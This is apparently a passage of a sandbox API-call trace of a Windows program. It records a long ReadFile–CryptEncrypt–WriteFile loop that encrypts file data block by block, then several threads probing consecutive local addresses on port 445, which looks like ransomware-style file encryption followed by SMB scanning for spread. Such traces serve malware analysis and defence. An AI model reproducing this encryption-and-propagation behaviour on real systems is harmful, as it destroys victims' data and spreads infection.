[0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.524] GetLastError () returned 0x0 [0204.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.524] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.525] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.525] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.525] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.525] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.525] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.525] GetLastError () returned 0x0 [0204.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.526] GetLastError () returned 0x0 [0204.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.526] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.527] GetLastError () returned 0x0 [0204.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.527] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.527] GetLastError () returned 0x0 [0204.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.527] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.527] GetLastError () returned 0x0 [0204.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.527] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.527] GetLastError () returned 0x0 [0204.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.527] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.527] GetLastError () returned 0x0 [0204.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.527] ReadFile (hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0) Thread: id = 797 os_tid = 0xe48 [0143.034] GetCurrentThreadId () returned 0xe48 [0143.034] GetCurrentThreadId () returned 0xe48 [0143.034] GetCurrentThreadId () returned 0xe48 [0143.034] _errno () returned 0x2889a38 [0143.035] wcslen (_String="192.168.0.1") returned 0xb [0143.035] wcstombs (in: _Dest=0x608018, _Source="192.168.0.1", _MaxCount=0xc | out: _Dest="192.168.0.1") returned 0xb [0143.035] htons (hostshort=0x1bd) returned 0xbd01 [0143.035] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0143.035] socket (af=2, type=1, protocol=0) returned 0x2f4 [0143.301] connect (s=0x2f4, name=0x2f7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0164.520] GetCurrentThreadId () returned 0xe48 [0164.520] GetCurrentThreadId () returned 0xe48 [0164.520] longjmp () [0164.520] GetCurrentThreadId () returned 0xe48 [0164.520] CloseHandle (hObject=0x24c) returned 1 [0164.520] GetCurrentThreadId () returned 0xe48 [0164.520] Sleep (dwMilliseconds=0x0) [0164.529] _endthreadex (_ReturnCode=0x0) Thread: id = 798 os_tid = 0xe3c [0143.291] GetCurrentThreadId () returned 0xe3c [0143.291] GetCurrentThreadId () returned 0xe3c [0143.291] GetCurrentThreadId () returned 0xe3c [0143.291] _errno () returned 0x609ce0 [0143.292] wcslen (_String="192.168.0.2") returned 0xb [0143.292] wcstombs (in: _Dest=0x2889fe8, _Source="192.168.0.2", _MaxCount=0xc | out: _Dest="192.168.0.2") returned 0xb [0143.292] htons (hostshort=0x1bd) returned 0xbd01 [0143.292] inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0143.292] socket (af=2, type=1, protocol=0) returned 0x2c4 [0143.296] connect (s=0x2c4, name=0x317fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16) returned -1 [0164.521] GetCurrentThreadId () returned 0xe3c [0164.521] GetCurrentThreadId () returned 0xe3c [0164.521] longjmp () [0164.521] GetCurrentThreadId () returned 0xe3c [0164.521] CloseHandle (hObject=0x25c) returned 1 [0164.521] GetCurrentThreadId () returned 0xe3c [0164.521] Sleep (dwMilliseconds=0x0) [0164.530] _endthreadex (_ReturnCode=0x0) Thread: id = 799 os_tid = 0xd18 [0143.292] GetCurrentThreadId () returned 0xd18 [0143.292] GetCurrentThreadId () returned 0xd18 [0143.292] GetCurrentThreadId () returned 0xd18 [0143.292] _errno () returned 0x2886c98 [0143.292] wcslen (_String="192.168.0.3") returned 0xb [0143.292] wcstombs (in: _Dest=0x288afc0, _Source="192.168.0.3", _MaxCount=0xc | out: _Dest="192.168.0.3") returned 0xb [0143.292] htons (hostshort=0x1bd) returned 0xbd01 [0143.292] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0143.292] socket (af=2, type=1, protocol=0) returned 0x2f0 [0143.301] connect (s=0x2f0, name=0x33bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16) returned -1 [0164.520] GetCurrentThreadId () returned 0xd18 [0164.520] GetCurrentThreadId () returned 0xd18 [0164.520] longjmp () [0164.520] GetCurrentThreadId () returned 0xd18 [0164.520] CloseHandle (hObject=0x264) returned 1 [0164.520] GetCurrentThreadId () returned 0xd18 [0164.520] Sleep (dwMilliseconds=0x0) [0164.528] _endthreadex (_ReturnCode=0x0) Thread: id = 800 os_tid = 0xe4c [0143.293] GetCurrentThreadId () returned 0xe4c [0143.293] GetCurrentThreadId () returned 0xe4c [0143.293] GetCurrentThreadId () returned 0xe4c [0143.293] _errno () returned 0x2881058 [0143.293] wcslen (_String="192.168.0.4") returned 0xb [0143.293] wcstombs (in: _Dest=0x288bf98, _Source="192.168.0.4", _MaxCount=0xc | out: _Dest="192.168.0.4") returned 0xb [0143.293] htons (hostshort=0x1bd) returned 0xbd01 [0143.293] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0143.293] socket (af=2, type=1, protocol=0) returned 0x2e8 [0143.300] connect (s=0x2e8, name=0x35ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.4"), namelen=16) returned -1 [0164.520] GetCurrentThreadId () returned 0xe4c [0164.520] GetCurrentThreadId () returned 0xe4c [0164.520] longjmp () [0164.520] GetCurrentThreadId () returned 0xe4c [0164.520] CloseHandle (hObject=0x208) returned 1 [0164.520] GetCurrentThreadId () returned 0xe4c [0164.520] Sleep (dwMilliseconds=0x0) [0164.528] _endthreadex (_ReturnCode=0x0) Thread: id = 801 os_tid = 0x210 [0143.293] GetCurrentThreadId () returned 0x210 [0143.293] GetCurrentThreadId () returned 0x210 [0143.293] GetCurrentThreadId () returned 0x210 [0143.293] _errno () returned 0x2881278 [0143.293] wcslen 